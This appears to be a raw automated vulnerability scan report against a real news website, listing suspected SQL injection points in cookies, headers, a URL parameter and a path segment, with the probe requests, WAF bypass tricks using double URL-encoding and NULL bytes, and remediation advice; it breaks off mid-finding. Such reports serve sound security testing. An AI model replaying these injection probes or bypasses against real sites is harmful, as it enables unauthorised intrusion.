<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /tim-kawakami/ci_16781111?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Even though theyre 4-7, 49ers take attitude someone has to win NFC West, so ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16781111?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/tim-kawakami/ci_1678 ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the currBrandCheck cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /tim-kawakami/ci_16781111?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%2527; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Even though theyre 4-7, 49ers take attitude someone has to win NFC West, so ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16781111?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%2527%2527; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/tim-kawakami/ci_1678 ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /tim-kawakami/ci_16793240?source=most_viewed%00' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT=''><meta name="keywords" content="Tim Kawakami sports column opinion "/><title>Tim Kawakami: ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16793240?source=most_viewed%00'' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/tim-kawakami/ci_1679 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /warriors/ci_16780373?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors offense isnt moving as fast as it once did'><meta name="keywords" conten ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16780373?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors offense isnt moving as fast as it once did'><meta name="keywords" conten ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/ci_16781614 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at Oklahoma CityTip: 4 p.m., Ford ArenaTV/Radio: CSNBA; 680-AMRecords: Warriors 8- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16781614 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/warriors/ci_16781614 ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /warriors/ci_16781614?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at Oklahoma CityTip: 4 p.m., Ford ArenaTV/Radio: CSNBA; 680-AMRecords: Warriors 8- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16781614?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at Oklahoma CityTip: 4 p.m., Ford ArenaTV/Radio: CSNBA; 680-AMRecords: Warriors 8- ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors'/ci_16786557?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='It marked the fifth time the Warriors were down double-digits early. They lost Sunday after ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /warriors''/ci_16786557?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/warriors''/ci_167865 ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /warriors/ci_16792619 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/warriors/ci_16792619?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:43:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:43:48 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/ci_16792619 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
